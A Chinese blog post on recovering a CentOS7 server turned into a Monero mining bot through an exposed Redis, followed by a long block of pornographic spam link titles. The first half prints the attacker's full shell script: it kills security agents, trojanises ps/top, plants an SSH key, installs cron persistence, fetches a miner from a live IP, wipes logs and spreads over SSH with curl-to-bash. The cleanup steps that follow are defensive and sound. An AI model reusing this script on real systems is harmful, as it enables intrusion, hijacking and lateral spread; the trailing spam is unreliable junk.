/tmp/kdevtmpfsi sleep 1 chattr -i /tmp/redis2 echo 1 > /tmp/redis2 chattr +i /tmp/redis2 chattr -ia /.Xll/xr >/.Xll/xr chattr +ia /.Xll/xr chattr -ia /etc/trace >/etc/trace chattr +ia /etc/trace chattr -ia /etc/newsvc.sh chattr -ia /etc/svc* chattr -ia /tmp/newsvc.sh chattr -ia /tmp/svc* >/etc/newsvc.sh >/etc/svcupdate >/etc/svcguard >/etc/svcworkmanager >/etc/svcupdates >/tmp/newsvc.sh >/tmp/svcupdate >/tmp/svcguard >/tmp/svcworkmanager >/tmp/svcupdates chattr +ia /etc/newsvc.sh chattr +ia /etc/svc* chattr +ia /tmp/newsvc.sh chattr +ia /tmp/svc* sleep 1 chattr -i /usr/lib/systemd/systemd-update-daily echo 1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % #echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab }kill_sus_proc() {ps axf -o "pid"|while read prociddols -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fifidoneps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddocat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fidone }downloads() {if [ -f "/usr/bin/curl" ]then echo $1,$2http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elsecurl --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/cd1" ]thenhttp_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elsecd1 --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/wget" ]thenwget --timeout=50 --tries=100 -O $2 $1if [ $? -ne 0 ]thenwget --timeout=100 --tries=100 -O $2 $3fielif [ -f "/usr/bin/wd1" ]thenwd1 --timeout=100 --tries=100 -O $2 $1if [ $? -eq 0 ]thenwd1 --timeout=100 --tries=100 -O $2 $3fifi }kill_miner_proc kill_sus_procunlock_cron() {chattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /var/spool/cron/crontabschattr -R -ia /etc/cron.d }lock_cron() {chattr -R +ia /var/spool/cronchattr +ia /etc/crontabchattr -R +ia /var/spool/cron/crontabschattr -R +ia /etc/cron.d }if [ -f "$rtdir" ] thenecho "i am root"mkdir -p /root/.sshecho "goto 1" >> /etc/zzhschattr -ia /etc/zzh*chattr -ia/etc/config.json*chattr -ia /etc/newinit.sh*chattr -ia /root/.ssh/authorized_keys*chattr -R -ia /root/.sshif [ -f "/bin/ps.original" ]thenecho "/bin/ps changed"elsemv /bin/ps /bin/ps.original echo "#! /bin/bash">>/bin/psecho "ps.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pschmod +x /bin/pstouch -d 20160825 /bin/psecho "/bin/ps changing"fiif [ -f "/bin/top.original" ]thenecho "/bin/top changed"elsemv /bin/top /bin/top.original echo "#! /bin/bash">>/bin/topecho "top.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/topchmod +x /bin/toptouch -d 20160825 /bin/topecho "/bin/top changing"fiif [ -f "/bin/pstree.original" ]thenecho "/bin/pstree changed"elsemv /bin/pstree /bin/pstree.original echo "#! /bin/bash">>/bin/pstreeecho "pstree.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pstreechmod +x /bin/pstreetouch -d 20160825 /bin/pstreeecho "/bin/pstree changing"fiif [ -f "/bin/chattr" ]thenchattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`if [ "$chattrsize" -lt "$chattr_size" ]thenyum -y remove e2fsprogsyum -y install e2fsprogselseecho "no need install chattr"fielseyum -y remove e2fsprogsyum -y install e2fsprogsfiunlock_cronrm -f ${crondir}rm -f /etc/cron.d/zzhrm -f /etc/crontabecho "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzhecho "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontabecho crontab createdlock_cronchmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver" > /root/.ssh/authorized_keyscd1 http://39.100.33.209/b2f628/call.txtwget -q -O- http://39.100.33.209/b2f628/call.txtcd1 http://39.100.33.209/b2f628/call.txtwget -q -O- http://39.100.33.209/b2f628/call.txtcfg="/etc/config.json"file="/etc/zzh"if [-f "/etc/config.json" ]thenfilesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`if [ "$filesize_config" -ne "$config_size" ] thenpkill -f zzhrm /etc/config.jsondownloads $config_url /etc/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /etc/config.json $config_url_backupfiif [ -f "/etc/zzh" ]thenfilesize1=`ls -l /etc/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f zzhrm /etc/zzhdownloads $miner_url /etc/zzh $miner_url_backupelseecho "not need download"fielsedownloads $miner_url /etc/zzh $miner_url_backupfidownloads $sh_url /etc/newinit.sh $sh_url_backupchmod 777 /etc/zzhif [ -f "/bin/ps.original" ]thenps.original -fe|grep zzh |grep -v grepelseps -fe|grep zzh |grep -v grepfiif [ $? -ne 0 ]thencd /etcecho "not root runing"sleep 5scpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l` if (("$cpunum"<=2 )); thencpunum=1echo $cpunum elif (("$cpunum"<=4)); thencpunum=2echo $cpunum elif (("$cpunum"<=8)); thencpunum=4echo $cpunum elif (("$cpunum"<=16)); thencpunum=8echo $cpunum elif (("$cpunum"<=32)); thencpunum=16echo $cpunum elif (("$cpunum"<=64)); thencpunum=32echo $cpunum elif (("$cpunum">64)); thencpunum=50echo $cpunum elseecho other fi./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &elseecho "root runing....."fichmod 777 /etc/zzhchattr +ia /etc/zzhchmod 777 /etc/config.jsonchattr +ia /etc/config.jsonchmod 777 /etc/newinit.shchattr +ia /etc/newinit.shchmod 600 /root/.ssh/authorized_keyschattr +ia /root/.ssh/authorized_keys elseecho "goto 1" > /tmp/zzhschattr -ia /tmp/zzh*chattr -ia /tmp/config.json*chattr -ia /tmp/newinit.sh*if [ ! -f "/usr/bin/crontab" ]thenunlock_cronecho "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}lock_cronelseunlock_cron[[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -lock_cronfiif [ -f "/tmp/config.json" ]thenfilesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`if [ "$filesize1" -ne "$config_size" ]thenpkill -f zzhrm /tmp/config.jsondownloads $config_url /tmp/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /tmp/config.json $config_url_backupfiif [ -f "/tmp/zzh" ]then filesize1=`ls -l /tmp/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f zzhrm /tmp/zzhdownloads $miner_url /tmp/zzh $miner_url_backupelseecho "no need download"fielsedownloads $miner_url /tmp/zzh $miner_url_backupfiecho "i am here"downloads $sh_url /tmp/newinit.sh $sh_url_backupps -fe|grep zzh |grep -v grepif [ $? -ne 0 ]thenecho "not tmp runing"cd /tmpchmod 777 zzhsleep 5scpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l` if (("$cpunum"<=2 )); thencpunum=1echo $cpunum elif (("$cpunum"<=4)); thencpunum=2echo $cpunum elif (("$cpunum"<=8)); thencpunum=4echo $cpunum elif (("$cpunum"<=16)); thencpunum=8echo $cpunum elif (("$cpunum"<=32)); thencpunum=16echo $cpunum elif (("$cpunum"<=64)); thencpunum=32echo $cpunum elif (("$cpunum">64)); thencpunum=50echo $cpunum else echo other fi./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &elseecho "tmp runing....."fichmod 777 /tmp/zzhchattr +i /tmp/zzhchmod 777 /tmp/newinit.shchattr +i /tmp/newinit.shchmod 777 /tmp/config.jsonchattr +i /tmp/config.jsonfiiptables -F iptables -X iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP service iptables reload ps auxf|grep -v grep|grep -v 43Xbgtym2GZWBk87XiYbCpTKGPBTxY|grep "stratum"|awk '{print $2}'|xargs kill -9 history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_historyyum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done fi echo "$bbdir" echo "$bbdira"$bbdir -fsSL http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash $bbdira -fsSL http://39.100.33.209/b2f628fff19fda999999999/is.sh | bash

關閉Linux子系統

?修改命令目錄

查找阿里云相關服務,停止進程(停止后控制臺無法使用云助手)?

寫入公鑰,實現免密登錄

?下載挖礦配置文件

為相關文件加入隱藏屬性及執行權限

清空服務器原有防火墻規則

?

解決方案

1.首先使用top命令排查系統中占用率極高的進程

一般挖礦腳本在啟動后,會極度消耗CPU資源,使用top命令查看服務器中啟動的進程。(此處因已結束相關進程,未見異常。)

top

2.停止異常進程

kill -9 {進程號}

3.刪除ssh下生成的異常公鑰

3.1 查看異常公鑰

3.2 去除文件隱藏屬性

查看文件隱藏屬性

lsattr {文件名}

去除隱藏屬性(需要去除哪個屬性就加上對應的參數)

chattr -iae

?

3.3 刪除公鑰

4.刪除定時任務

4.1查看定時任務

4.2去除文件隱藏屬性

定時任務刪除可使用如下命令

crontab -r

或者直接刪除/var/spool/cron/{用戶名} 文件?

此時直接刪除會提示無權限(root權限提示我無權限?文件的隱藏屬性)

使用chattr命令后再進行刪除

4.3刪除文件

rm /var/spool/cron/root

5.crontab日志文件分析

5.1 查看日志文件

cat /var/log/cron

? 分析可知etc目錄下仍存在定時腳本

?

5.2 查看相關腳本

5.3刪除可疑文件

6.清理緩存殘留

6.1去除隱藏屬性

6.2?刪除緩存文件

rm -rf /tmp/

?7.相關配置文件刪除

刪除挖礦配置文件config.json、newsvc.sh zzh zzhs

8.設置安全組,禁止惡意ip訪問

通過域名查找IP地址

添加安全組出方向規則?

?

9.恢復被修改的命令

mv /usr/bin/url /usr/bin/curl mv /usr/bin/cd1 /usr/bin/url mv /usr/bin/get /usr/bin/wget mv /usr/bin/wd1 /usr/bin/get mv /bin/ps.original /bin/ps mv /bin/top.original /bin/top mv /bin/pstree.original /bin/pstree

?10.防范措施

新增普通用戶,禁止遠程登錄,以此用戶啟動Redis服務。

修改redis.conf文件中的bind 127.0.0.1為為自己數據庫要訪問的地址

bind x.x.x.x

在redis.conf中新增requirepass字段

requirepass {復雜密碼}

?

總結

以上是生活随笔為你收集整理的记一次CentOS7因Redis配置不当导致被Root提权沦为矿机修复过程的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

深爱激情亚洲 | 欧美日韩一二三四区 | 瑞典xxxx性hd极品 | 在线小视频国产 | 亚洲视频 中文字幕 | 操老逼免费视频 | 96精品高清视频在线观看软件特色 | 美女精品久久久 | 天天草天天摸 | 亚洲激情综合网 | 狂野欧美激情性xxxx欧美 | 亚洲电影av在线 | 久久久人人爽 | 精品国产一区二区三区噜噜噜 | 日韩在线电影一区二区 | 欧美一区三区四区 | 国产一二区免费视频 | 日韩av一区二区三区 | 久久综合射 | 97天堂| 99免费看片 | 久草在线观看视频免费 | 久久久91精品国产一区二区精品 | 蜜桃av人人夜夜澡人人爽 | 激情黄色一级片 | 亚洲精品国偷自产在线99热 | 久久久久久久av麻豆果冻 | av中文字幕剧情 | 黄色av电影在线观看 | av黄色免费看 | 99久热精品 | 精品免费视频123区 午夜久久成人 | 亚洲天天综合网 | 久草在线免费新视频 | 九九免费在线视频 | 一区 二区 精品 | 国产成人精品av久久 | 黄色影院在线观看 | 国产成人精品免费在线观看 | 激情丁香5月 | 2019中文字幕网站 | 日韩av在线不卡 | 99精品在线免费观看 | 日韩久久精品一区二区 | 青草视频在线播放 | 九色视频网 | 国产精品一区二区免费在线观看 | 91九色视频国产 | 亚洲国产欧美在线看片xxoo | 日韩欧美一区二区三区免费观看 | 国产一区视频导航 | 久久夜夜操| 久久免费看 | 能在线观看的日韩av | 成人午夜电影久久影院 | 一区二区三区视频网站 | 日韩美女黄色片 | 中文字幕 国产精品 | 免费福利视频网站 | 公与妇乱理三级xxx 在线观看视频在线观看 | 99色视频| 天天射天天干天天操 | 激情网在线视频 | 人人搞人人搞 | 久久久久免费视频 | 色九九视频 | 日韩av中文在线观看 | 天堂久久电影网 | 丁香婷婷深情五月亚洲 | 一区二区中文字幕在线观看 | 久久只精品99品免费久23小说 | 色噜噜在线观看 | 日韩xxx视频 | 欧美va日韩va | 欧美日韩免费一区 | 99精品视频免费看 | 不卡电影免费在线播放一区 | 国产剧情一区在线 | av高清网站在线观看 | 免费裸体视频网 | 久久99精品国产 | 免费观看性生交 | 黄色com| 成人午夜影院 | 亚洲三级网站 | 日韩欧美在线视频一区二区 | 99视频精品 | 毛片网在线播放 | 国内精品在线看 | 日韩av成人在线 | 中文字幕免费看 | 天天射,天天干 | 四虎成人精品永久免费av九九 | 黄色小说在线观看视频 | 日韩av一区二区在线 | 日韩一区二区三区不卡 | 天堂av在线免费观看 | v片在线播放| 国产一级电影免费观看 | 99产精品成人啪免费网站 | 久草在线视频新 | 亚洲情感电影大片 | 免费av网站在线 | 国产亚洲精品久久久久久久久久久久 | 天天干天天干天天操 | 97中文字幕 | 69夜色精品国产69乱 | 五月综合激情网 | 免费观看9x视频网站在线观看 | 97国产精品一区二区 | 五月激情在线 | 天天操天天操天天 | 一区二区三区中文字幕在线观看 | 亚洲精品日韩在线观看 | 久久精品99北条麻妃 | 久草精品电影 | 碰天天操天天 | 黄污在线观看 | 欧美成人h版| 国产一区二区三区 在线 | 又长又大又黑又粗欧美 | 亚洲精品中文字幕在线观看 | 97国产超碰在线 | 久久99精品久久久久久 | 欧美激情在线网站 | 久久久香蕉视频 | 国产美女精品视频免费观看 | 中文字幕亚洲在线观看 | 久久综合久久久 | 国产精品99免视看9 国产精品毛片一区视频 | 色综合久久久网 | 91视频在线国产 | 国产精品久久网站 | 久久久国产精品人人片99精片欧美一 | av成人动漫 | 免费的成人av | 九色精品免费永久在线 | 色婷婷国产精品一区在线观看 | 狠狠成人 | 中文字幕免费高清 | 国产精品一区二区免费在线观看 | 午夜久久久久久久 | 黄色影院在线免费观看 | 91超级碰碰| 精品亚洲va在线va天堂资源站 | 亚洲天堂精品视频在线观看 | 美女在线免费观看视频 | 日韩在线国产 | 91中文字幕网 | 国内三级在线 | 中文字幕在线观看网址 | 西西444www高清大胆 | 99色在线播放 | 婷婷丁香综合 | 99精品视频精品精品视频 | 久久午夜影院 | 亚洲精品国产精品乱码不99热 | 国产精品一区二区免费在线观看 | 亚洲精品成人在线 | 毛片99 | 狠狠狠色丁香综合久久天下网 | 亚洲精品一区二区三区高潮 | 九九精品视频在线看 | 亚洲国产手机在线 | 日韩在线免费看 | 色的网站在线观看 | 九九99靖品 | 日韩久久精品 | 黄色成人毛片 | 超碰在线98| 久久精品视频在线观看 | 国产精品福利av | 国内视频1区 | 精品在线观看一区二区 | 亚洲乱码中文字幕综合 | 亚洲观看黄色网 | 久久免费视频国产 | 99久久久国产精品免费观看 | 福利视频区 | 超碰人人射| 国产精品福利无圣光在线一区 | 丝袜足交在线 | 亚洲欧美国产日韩在线观看 | 欧美日韩中文视频 | 九色视频网址 | 精品专区 | 国内视频在线 | av在线免费播放网站 | 精品国产诱惑 | 一本之道乱码区 | 国产黄色大片 | 一区二区三区久久 | 伊甸园av在线 | 一级黄色片网站 | 九草在线视频 | 久久久久久久久影视 | 天天色天天干天天 | 久草在线视频免费资源观看 | 亚洲japanese制服美女 | 91av大全| 91福利影院在线观看 | 国产麻豆精品久久 | 91.dizhi永久地址最新 | 久久久精品网站 | 亚洲久草在线 | 亚洲最新在线 | 狠狠色伊人亚洲综合网站野外 | 国产成人一区二区三区影院在线 | 日韩av中文在线观看 | 国产日韩高清在线 | 黄色免费av | 98超碰人人 | 色av网站| 在线中文字幕视频 | 欧美性久久久久久 | 天天色天天射天天综合网 | 国产高清成人av | 久久久久久综合网天天 | 三级av片 | 视频91 | 国产亚洲在线观看 | 欧美专区国产专区 | 国产无套视频 | 视频在线观看入口黄最新永久免费国产 | 99视频在线观看免费 | av大片免费| 色婷婷成人 | 日韩欧美视频在线播放 | 91丨九色丨国产在线 | 天天爽人人爽 | 国产黄色大全 | 91精品国产乱码久久 | 久久深夜福利免费观看 | 98精品国产自产在线观看 | 精品一二三区视频 | av电影免费在线看 | 毛片网站在线 | 国产精品一区免费看8c0m | 亚洲免费av观看 | 亚洲在线高清 | 婷婷新五月 | 涩涩成人在线 | 欧美精品一区二区三区四区在线 | 亚洲精品视频在线播放 | 免费高清在线观看成人 | 不卡av电影在线观看 | 欧洲精品视频一区 | 天天做天天爱天天综合网 | 一区二区不卡 | 在线观看的a站 | 日韩免费在线网站 | 看国产黄色大片 | 99精品视频在线观看 | 五月天堂色 | 干干夜夜 | 91漂亮少妇露脸在线播放 | 美女精品| 91麻豆精品国产91久久久使用方法 | 欧美日本中文字幕 | 精品福利网| 成人免费在线视频 | 久草免费在线视频 | 91精品国产成 | 中文字幕欲求不满 | 夜夜操网| 国产成人av网站 | 日韩欧美视频在线观看免费 | 免费观看日韩av | 国产精品视频地址 | 九九九视频精品 | 久久亚洲欧美日韩精品专区 | 成人一级片在线观看 | www.狠狠干 | 91大神一区二区三区 | 国产男女爽爽爽免费视频 | 国产手机视频精品 | 国产亚洲成人网 | 美女视频黄频 | 日本在线观看中文字幕无线观看 | 国产裸体永久免费视频网站 | 国产视频一区二区在线播放 | 日本久久电影 | 国产乱对白刺激视频不卡 | 久久精品日产第一区二区三区乱码 | 久久久高清免费视频 | 国产专区日韩专区 | 久久综合九色综合久久久精品综合 | 天天射天天操天天干 | 四虎www. | 国产精品视频永久免费播放 | 人人射人人爽 | 91九色porny蝌蚪主页 | 欧美激情奇米色 | 中文字幕.av.在线 | 91成人网页版 | 亚洲精品毛片一级91精品 | 激情五月婷婷综合网 | 欧美精品一区二区蜜臀亚洲 | 99热这里只有精品在线观看 | 国产特级毛片aaaaaaa高清 | 亚洲国产手机在线 | 亚洲精品www久久久 www国产精品com | 免费人成在线观看 | 99久久精品免费看国产一区二区三区 | 天天操天天射天天插 | 国产一区国产二区在线观看 | 亚洲永久精品在线观看 | 日韩专区 在线 | 亚洲婷久久 | 制服丝袜一区二区 | 亚洲五月六月 | 草久中文字幕 | 91人人人 | 丰满少妇高潮在线观看 | 成人精品一区二区三区电影免费 | 粉嫩高清一区二区三区 | 久久视频在线观看中文字幕 | 午夜免费电影院 | 一本—道久久a久久精品蜜桃 | 黄色在线免费观看网址 | 天天色天天综合网 | 在线免费观看的av | 亚洲黄色在线观看 | 欧美日韩伦理在线 | 久久久久亚洲天堂 | 成人一区影院 | 免费电影一区二区三区 | 婷婷中文字幕在线观看 | 中文字幕在线不卡国产视频 | 人人插人人搞 | 麻豆av一区二区三区在线观看 | 成人一级在线 | 91天天操 | 久久精品国产亚洲精品2020 | 狠狠干我| 又色又爽的网站 | 一区二区三区高清在线 | 国产精品美女免费 | 久久一区二区三区日韩 | 成人网在线免费视频 | 日本福利视频在线 | av网站在线免费观看 | 奇米影视四色8888 | 韩国av一区二区三区 | 91九色精品女同系列 | 亚洲精品乱码久久久久久蜜桃欧美 | 99热精品视 | 国产一二区在线观看 | 日日干,天天干 | 波多野结衣在线播放视频 | 国产亚洲一级高清 | 国产日韩精品一区二区三区在线 | 久草精品在线 | 在线观看一级片 | 欧美极品一区二区三区 | 在线精品亚洲一区二区 | 天天插天天 | 日韩精品在线一区 | 欧美91在线 | 国产无套精品久久久久久 | 特黄免费av| 国产精品久久久久免费 | 天天草天天干 | 精品久久久久久久久久久久久久久久 | 免费又黄又爽的视频 | 6699私人影院 | 91影视成人 | 九九爱免费视频 | 黄色三级免费片 | 免费a网址 | 能在线看的av | 四虎国产视频 | 一本一本久久a久久精品综合 | 操操操干干干 | 国产在线999 | 国产黄色视 | 国产精品99视频 | 亚洲最新视频在线 | 国产精品毛片完整版 | 最新日本中文字幕 | 国产99久 | 黄色毛片电影 | 美女激情影院 | 欧美巨大 | 嫩草av在线 | 99九九热只有国产精品 | 亚洲精品在线观看视频 | 日韩欧美v | 欧美91精品久久久久国产性生爱 | 99色99| 久久视频免费看 | 黄色三级网站 | 日韩二区三区在线 | av线上免费看 | 99一级片 | 婷婷久久网站 | 免费黄色av电影 | 成 人 黄 色 视频播放1 | 久久a v视频 | 日韩av在线一区二区 | 91福利试看| 亚洲aaa级| 国产在线观看国语版免费 | 久草视频在线观 | 91精品色| 91视频国产高清 | 91在线视频在线观看 | 午夜影院在线观看18 | 伊人影院在线观看 | 亚洲自拍偷拍色图 | 免费日韩一区二区三区 | 开心激情五月婷婷 | 精品在线小视频 | www久久九| 欧美日韩大片在线观看 | 黄色特级一级片 | 欧洲精品久久久久毛片完整版 | 久亚洲 | 成人黄色国产 | 亚洲最新视频在线 | 伊人黄 | 国产又黄又猛又粗 | 国产黄在线播放 | 国产一区二区精品久久91 | 久久99婷婷 | 99亚洲国产 | 91中文字幕网 | 香蕉免费在线 | 亚洲国产精品视频在线观看 | 九九热精品视频在线播放 | 99激情网 | 九九综合久久 | 99久久精品国产亚洲 | 国产黑丝袜在线 | 欧美成人黄色 | 欧美一级片在线播放 | 国产第页 | 在线国产欧美 | 国产精品久久在线 | 日韩高清久久 | 首页中文字幕 | 九九免费在线看完整版 | 成人黄色电影在线观看 | 精品国产伦一区二区三区免费 | 国产美女精品视频 | 成人av免费播放 | 六月激情丁香 | 久久综合激情 | 亚洲国产97在线精品一区 | 国产999视频 | 国模视频一区二区三区 | 婷婷在线色 | 韩国av免费观看 | 婷婷色在线观看 | av丝袜美腿| 美女精品国产 | 激情五月综合 | 丁香婷婷激情国产高清秒播 | 丁香影院在线 | 国产午夜精品av一区二区 | 久久久99国产精品免费 | 婷婷国产视频 | 久久另类小说 | 美女网站色 | 久草综合视频 | 黄色福利网 | 99爱视频在线观看 | 免费久久精品视频 | 又湿又紧又大又爽a视频国产 | 狠狠干成人| 97小视频| 在线播放视频一区 | 国产在线视频一区二区三区 | 五月婷婷开心 | 欧美久久精品 | 成人黄色在线电影 | 成人午夜影视 | 在线观看亚洲视频 | 天天干,夜夜爽 | 国产又粗又猛又色又黄网站 | 在线视频 91| 亚洲午夜久久久久久久久久久 | 欧美一级片在线播放 | 久草电影免费在线观看 | 99视频+国产日韩欧美 | 午夜免费久久看 | 国产二级视频 | 在线最新av | 一区二区三区视频网站 | 日韩视频图片 | 亚洲免费激情 | 国产精品岛国久久久久久久久红粉 | 国产精品久久久久aaaa九色 | 精品国产福利在线 | 久久久久久久久影院 | 久久精品视频在线 | 在线播放第一页 | 在线播放 日韩专区 | 日日操网站 | 色综合久久五月天 | 人人澡人人爱 | 日黄网站| 成年人在线看片 | 人人插人人费 | www.888av| 欧美色精品天天在线观看视频 | 国产伦精品一区二区三区免费 | 国产精品久久久久国产a级 激情综合中文娱乐网 | 日韩理论在线播放 | 久久精品亚洲精品国产欧美 | 久久www免费人成看片高清 | 婷婷色网站| 久久精品国产亚洲精品 | 激情导航 | 深爱激情综合 | 国产精品一区二区久久久 | 免费 在线 中文 日本 | 丁香婷婷色月天 | 在线观看亚洲精品 | 男女啪啪免费网站 | 超碰在线官网 | 99热精品视 | av性网站| 亚洲一区精品人人爽人人躁 | 精品国产_亚洲人成在线 | 最近免费在线观看 | 亚洲精品资源在线观看 | 欧美日韩国产在线精品 | 福利一区在线视频 | 夜夜婷婷 | 黄色大全免费网站 | av免费网站在线观看 | 国产精品午夜久久久久久99热 | 91福利视频免费观看 | 开心综合网 | 亚洲欧洲国产视频 | 91刺激视频| a天堂一码二码专区 | 五月天久久 | 91看国产| 四虎成人精品永久免费av九九 | 精品国产一区二区在线 | 日韩中文字幕91 | 国产91粉嫩白浆在线观看 | 激情网第四色 | 成人网在线免费视频 | 欧洲精品视频一区二区 | 日本精品中文字幕 | 亚洲 成人 欧美 | 免费精品视频在线观看 | 91视频高清免费 | 国产精品6 | 激情影音 | 日韩在线短视频 | 国产一区私人高清影院 | 91高清不卡 | 亚洲精品中文在线资源 | 日韩av在线不卡 | 国产小视频在线观看免费 | 久久国产精品免费一区 | 国产在线播放一区 | 韩国av免费观看 | 中文字幕一区在线 | 欧美国产高清 | 亚洲国产中文字幕在线观看 | 99久久成人 | 免费观看完整版无人区 | 97超碰人人模人人人爽人人爱 | 日韩视频在线播放 | 嫩草91影院| 日日摸日日碰 | 日韩成人黄色 | 日韩黄色免费 | 久久久国产精品电影 | 欧美另类xxxxx| 中文字幕在线免费97 | 在线观看中文字幕视频 | 蜜臀av夜夜澡人人爽人人桃色 | 精品1区2区| 亚洲一级电影在线观看 | 黄色免费观看网址 | 